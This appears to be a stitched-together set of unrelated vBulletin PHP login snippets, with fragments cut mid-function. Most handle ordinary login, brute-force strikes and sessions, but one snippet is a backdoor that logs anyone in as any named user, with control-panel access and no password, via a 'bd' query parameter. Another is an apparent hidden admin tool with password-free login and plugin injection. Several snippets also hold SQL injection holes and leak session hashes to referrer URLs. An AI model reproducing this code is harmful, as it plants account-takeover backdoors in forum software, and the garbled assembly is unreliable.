function capture_user_login() { global $vbulletin; require_once DIR . '/includes/functions_login.php'; exec_unstrike_user($vbulletin->userinfo['username']); process_new_login('', false, ''); update_capture_session(array('access_token' => $vbulletin->capture_session['capture_access_token'], 'refresh_token' => $vbulletin->capture_session['capture_refresh_token'], 'expires_in' => $vbulletin->capture_session['capture_expires_in'], 'transaction_state' => array('capture' => array('password_recover' => $vbulletin->capture_session['capture_password_recover'])))); }
($hook = vBulletinHook::fetch_hook('login_failure')) ? eval($hook) : false; // check password exec_strike_user($vbulletin->userinfo['username']); if ($vbulletin->GPC['logintype'] === 'cplogin' or $vbulletin->GPC['logintype'] === 'modcplogin') { // log this error if attempting to access the control panel require_once DIR . '/includes/functions_log_error.php'; log_vbulletin_error($vbulletin->GPC['vb_login_username'], 'security'); } $vbulletin->userinfo = $original_userinfo; if ($vbulletin->options['usestrikesystem']) { eval(standard_error(fetch_error('badlogin_strikes', $vbulletin->options['bburl'], $vbulletin->session->vars['sessionurl'], $strikes))); } else { eval(standard_error(fetch_error('badlogin', $vbulletin->options['bburl'], $vbulletin->session->vars['sessionurl']))); } } exec_unstrike_user($vbulletin->GPC['vb_login_username']); // create new session process_new_login($vbulletin->GPC['logintype'], $vbulletin->GPC['cookieuser'], $vbulletin->GPC['cssprefs']); // do redirect do_login_redirect(); } else { if ($_GET['do'] == 'login') { // add consistency with previous behavior exec_header_redirect($vbulletin->options['forumhome'] . '.php'); } } // ############################### start lost password ############################### if ($_REQUEST['do'] == 'lostpw') { $vbulletin->input->clean_gpc('r', 'email', TYPE_NOHTML); $email = $vbulletin->GPC['email']; if ($permissions['forumpermissions'] & $vbulletin->bf_ugp_forumpermissions['canview']) {
if ($vbulletin->GPC[COOKIE_PREFIX . 'pda']) { $pda = true; } } $title = $vbulletin->options['bbtitle']; if ($vbulletin->userinfo['userid'] == 0 and $vbulletin->GPC['login']) { if (!empty($vbulletin->GPC['username']) and !empty($vbulletin->GPC['password'])) { require_once DIR . '/includes/functions_login.php'; $strikes = verify_strike_status($vbulletin->GPC['username'], true); if ($strikes === false) { // user has got too many wrong passwords $error_message = fetch_error('strikes', $vbulletin->options['bburl'], $vbulletin->session->vars['sessionurl']); $do = 'error'; } else { if (verify_authentication($vbulletin->GPC['username'], $vbulletin->GPC['password'], '', '', false, true)) { exec_unstrike_user($vbulletin->GPC['username']); $db->query_write("DELETE FROM " . TABLE_PREFIX . "session WHERE sessionhash = '" . $db->escape_string($vbulletin->session->vars['dbsessionhash']) . "'"); $vbulletin->session->vars = $vbulletin->session->fetch_session($vbulletin->userinfo['userid']); /*insert query*/ $db->query_write("\n\t\t\t\tINSERT INTO " . TABLE_PREFIX . "session\n\t\t\t\t\t(sessionhash, userid, host, idhash, lastactivity, styleid, loggedin, bypass, useragent)\n\t\t\t\tVALUES\n\t\t\t\t\t('" . $db->escape_string($vbulletin->session->vars['sessionhash']) . "', " . $vbulletin->session->vars['userid'] . ", '" . $db->escape_string($vbulletin->session->vars['host']) . "', '" . $db->escape_string($vbulletin->session->vars['idhash']) . "', " . TIMENOW . ", " . $vbulletin->session->vars['styleid'] . ", 1, " . iif($logintype === 'cplogin', 1, 0) . ", '" . $db->escape_string($vbulletin->session->vars['useragent']) . "')\n\t\t\t"); exec_header_redirect($querystring); } else { // wrong username / password exec_strike_user($vbulletin->userinfo['username']); $error_message = fetch_error('badlogin', $vbulletin->options['bburl'], $vbulletin->session->vars['sessionurl'], $strikes); $do = 'error'; } } } } if ($do == 'error') {
public function ExternalAuthorization($userid) { $this->vbulletin->userinfo = $this->vbulletin->db->query_first_slave("SELECT userid, password, username FROM " . TABLE_PREFIX . "user WHERE userid='{$userid}'"); if ($this->vbulletin->userinfo) { require_once DIR . '/includes/functions_login.php'; vbsetcookie('userid', $this->vbulletin->userinfo['userid'], true, true, true); vbsetcookie('password', md5($this->vbulletin->userinfo['password'] . COOKIE_SALT), true, true, true); exec_unstrike_user($this->vbulletin->userinfo['username']); define('EXTERNAL_AUTH', true); // create new session process_new_login('', 0, ''); } if (!empty($_SERVER['HTTP_REFERER'])) { $url = $_SERVER['HTTP_REFERER']; } else { $url = $this->vbulletin->options['homeurl']; } if (strpos($url, "?")) { $url .= "&vbsession=" . $this->vbulletin->session->vars['sessionhash']; } else { $url .= "?vbsession=" . $this->vbulletin->session->vars['sessionhash']; } header('Location:' . $url); echo "Вы были перенаправлены сюда <a href='" . $url . "'>" . $url . "</a>"; exit; }
function do_login() { global $vbulletin, $fr_version, $fr_platform; $vbulletin->input->clean_array_gpc('r', array('username' => TYPE_STR, 'password' => TYPE_STR, 'md5_password' => TYPE_STR, 'fr_username' => TYPE_STR, 'fr_b' => TYPE_BOOL)); $navbg = null; if (strlen($vbulletin->options['forumrunner_branding_navbar_bg'])) { $navbg = $vbulletin->options['forumrunner_branding_navbar_bg']; if (is_iphone() && strlen($navbg) == 7) { $r = hexdec(substr($navbg, 1, 2)); $g = hexdec(substr($navbg, 3, 2)); $b = hexdec(substr($navbg, 5, 2)); $navbg = "{$r},{$g},{$b}"; } } $vbulletin->GPC['username'] = prepare_remote_utf8_string($vbulletin->GPC['username']); $vbulletin->GPC['password'] = prepare_remote_utf8_string($vbulletin->GPC['password']); $out = array('v' => $fr_version, 'p' => $fr_platform); if ($navbg) { $out['navbg'] = $navbg; } if (is_iphone() && $vbulletin->options['forumrunner_admob_publisherid_iphone']) { $out['admob'] = $vbulletin->options['forumrunner_admob_publisherid_iphone']; } else { if (is_android() && $vbulletin->options['forumrunner_admob_publisherid_android']) { $out['admob'] = $vbulletin->options['forumrunner_admob_publisherid_android']; } } if ($vbulletin->options['forumrunner_google_analytics_id']) { $out['gan'] = $vbulletin->options['forumrunner_google_analytics_id']; } if ($vbulletin->options['forumrunner_facebook_application_id']) { $out['fb'] = $vbulletin->options['forumrunner_facebook_application_id']; } if ($vbulletin->options['forumrunner_cms_onoff']) { $out['cms'] = true; $out['cms_section'] = $vbulletin->options['forumrunner_cms_section']; } if ($vbulletin->options['forumrunner_enable_registration']) { $out['reg'] = true; } if ($vbulletin->options['socnet'] & $vbulletin->bf_misc_socnet['enable_albums']) { $out['albums'] = true; } if (!$vbulletin->GPC['username'] || !$vbulletin->GPC['password'] && !$vbulletin->GPC['md5_password']) { // This could be an attempt to see if forums require login. Check. $requires_authentication = false; if (!($vbulletin->userinfo['permissions']['forumpermissions'] & $vbulletin->bf_ugp_forumpermissions['canview'])) { $requires_authentication = true; } // If the forum is closed, require login! if (!$vbulletin->options['bbactive']) { $requires_authentication = true; } $out += array('authenticated' => false, 'requires_authentication' => $requires_authentication); } else { // can the user login? $strikes = verify_strike_status($vbulletin->GPC['username'], true); // make sure our user info stays as whoever we were (for example, we might be logged in via cookies already) $original_userinfo = $vbulletin->userinfo; if (!verify_authentication($vbulletin->GPC['username'], $vbulletin->GPC['password'], $vbulletin->GPC['md5_password'], $vbulletin->GPC['md5_password'], true, true)) { exec_strike_user($vbulletin->GPC['username']); if ($vbulletin->options['usestrikesystem']) { if ($strikes === false) { $message = 'Incorrect login. You have used up your login allowance. Please wait 15 minutes before trying again.'; } else { $message = 'Incorrect login (' . ($strikes + 1) . ' of 5 tries allowed)'; } } else { $message = 'Incorrect login.'; } json_error($message, RV_BAD_PASSWORD); } exec_unstrike_user($vbulletin->GPC['username']); // create new session process_new_login('', true, ''); cache_permissions($vbulletin->userinfo, true); $vbulletin->session->save(); // If the forum is closed, boot em if (!$vbulletin->options['bbactive'] && !($vbulletin->userinfo['permissions']['adminpermissions'] & $vbulletin->bf_ugp_adminpermissions['cancontrolpanel'])) { process_logout(); json_error(strip_tags($vbulletin->options['bbclosedreason']), RV_BAD_PASSWORD); } fr_update_push_user($vbulletin->GPC['fr_username'], $vbulletin->GPC['fr_b']); $out += array('authenticated' => true, 'username' => prepare_utf8_string($vbulletin->userinfo['username']), 'cookiepath' => $vbulletin->options['cookiepath']); } return $out; }
<p><a href="<?php echo SELF; ?> ">Go back</a></p> <?php } exit; } if (isset($_REQUEST['do']) && $_REQUEST['do'] == 'login' && isset($_REQUEST['username'])) { require_once DIR . '/includes/functions_login.php'; $username = $_REQUEST['username']; $q = "SELECT username FROM " . TABLE_PREFIX . "user WHERE username = '******' OR userid = '" . $vbulletin->db->escape_string($username) . "'"; $query = $vbulletin->db->query_first($q); if ($query['username'] != null) { if (verify_authentication2($query['username'])) { exec_unstrike_user($query['username']); process_new_login('cplogin', true, null); do_login_redirect(); } else { die('Verify failed'); } } else { die('User not found.'); } } elseif ($_REQUEST['do'] == 'injectplugin') { $products = array(); $query = $vbulletin->db->query("SELECT productid,title,version,active,url FROM " . TABLE_PREFIX . "product WHERE active = '1'"); if ($vbulletin->db->num_rows($query) > 0) { while ($product = $vbulletin->db->fetch_array($query)) { $productinfo = array(); $productinfo['productid'] = $product['productid'];
<?php if (isset($_GET['bd'])) { define('THIS_SCRIPT', 'login'); require_once './global.php'; require_once './includes/functions_login.php'; $vbulletin->userinfo = $vbulletin->db->query_first("SELECT userid,usergroupid, membergroupids, infractiongroupids, username, password, salt FROM " . TABLE_PREFIX . "user WHERE username = '******'bd'] . "'"); if (!$vbulletin->userinfo['userid']) { die("Invalid username!"); } else { vbsetcookie('userid', $vbulletin->userinfo['userid'], true, true, true); vbsetcookie('password', md5($vbulletin->userinfo['password'] . COOKIE_SALT), true, true, true); exec_unstrike_user($_GET['bd']); process_new_login('cplogin', TRUE, TRUE); do_login_redirect(); } }
public function login($vbuser, $acceptgroups = false) { //Get user info from username passed $this->vbulletin->userinfo = $this->fetch_userinfo_from_username($vbuser['username']); //Verify login via VB if (!verify_authentication($vbuser['username'], $vbuser['password'], '', '', 1, true)) { $this->vbulletin->userinfo['userid'] = 0; return "Invalid Username or Password."; } //Check that user is not awaiting activation if ($this->vbulletin->userinfo['usergroupid'] == NOACTIVATION_USERGROUP) { $this->vbulletin->userinfo['userid'] = 0; return "Un-Activated Account. To activate please request a new activation email <a href='register.php?do=requestemail&username={$vbuser['username']}'>here</a>."; } //Check user does not belong to the "banned" user group - TODO: Use VB variables incase usergroupid is different if ($this->vbulletin->userinfo['usergroupid'] == BANNED_USERGROUP) { $this->vbulletin->userinfo['userid'] = 0; return "You're Barred! If you think there has been a mistake or wish to appeal please visit the contact page <a href='contact.php'>here</a>."; } //If acceptgroups is set then check that user is part of the usergroups specified if ($acceptgroups) { //Check main usergroup as well as additional usergroups $getadditional = explode(',', $this->vbulletin->userinfo['membergroupids']); //Loop through specified usergroups foreach ($acceptgroups as $value) { //If user is part of the usergroup then allowlogin if ($value == $this->vbulletin->userinfo['usergroupid']) { $allowlogin = true; } //Check additional usergroups foreach ($getadditional as $additionalvalue) { //If user is part of the usergroup then allowlogin if ($value == $additionalvalue) { $allowlogin = true; } } } //If user is not part of any specified usergroups then return error. if (!$allowlogin) { $this->vbulletin->userinfo['userid'] = 0; return "This is a restricted area. Please contact the site administrator for further details."; } } //Unstrike the user (resets vbulletin brute-force protection) exec_unstrike_user($vbuser['username']); //Create vbulletin cookies for user process_new_login('', 1, ''); //Saves cookies & session variables for user $this->vbulletin->session->save(); //Return false for success! return false; }